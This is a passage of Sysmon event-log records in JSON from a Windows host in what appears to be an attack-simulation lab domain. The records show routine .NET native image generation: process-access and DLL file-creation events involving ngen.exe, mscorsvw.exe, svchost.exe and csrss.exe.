{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7472,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.648\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-00101B990D00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.648","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-00101B990D00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7473,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:42.695\r\nProcessGuid: {41C8662E-2256-5F25-0000-00101B990D00}\r\nProcessId: 2608\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a30-0\\PresentationFramework-SystemCore.dll\r\nCreationUtcTime: 2020-08-01 08:05:42.695","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:42.695","ProcessGuid":"{41C8662E-2256-5F25-0000-00101B990D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a30-0\\PresentationFramework-SystemCore.dll","CreationUtcTime":"2020-08-01 08:05:42.695","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7474,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.726\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-0010400F0B00}\r\nTargetProcessId: 2060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.726","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-0010400F0B00}","TargetProcessId":"2060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7475,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.726\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-0010400F0B00}\r\nTargetProcessId: 2060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.726","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-0010400F0B00}","TargetProcessId":"2060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7476,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-0010400F0B00}\r\nTargetProcessId: 2060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-0010400F0B00}","TargetProcessId":"2060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7477,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.913\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00100F1A0B00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.913","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00100F1A0B00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7478,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.913\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00100F1A0B00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.913","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00100F1A0B00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7479,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.913\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00100F1A0B00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.913","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00100F1A0B00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7480,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:42.960\r\nProcessGuid: {41C8662E-2256-5F25-0000-001020A10D00}\r\nProcessId: 4728\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1278-0\\PresentationFramework-SystemData.dll\r\nCreationUtcTime: 2020-08-01 08:05:42.960","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:42.960","ProcessGuid":"{41C8662E-2256-5F25-0000-001020A10D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1278-0\\PresentationFramework-SystemData.dll","CreationUtcTime":"2020-08-01 08:05:42.960","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7481,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.991\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-001048A50D00}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 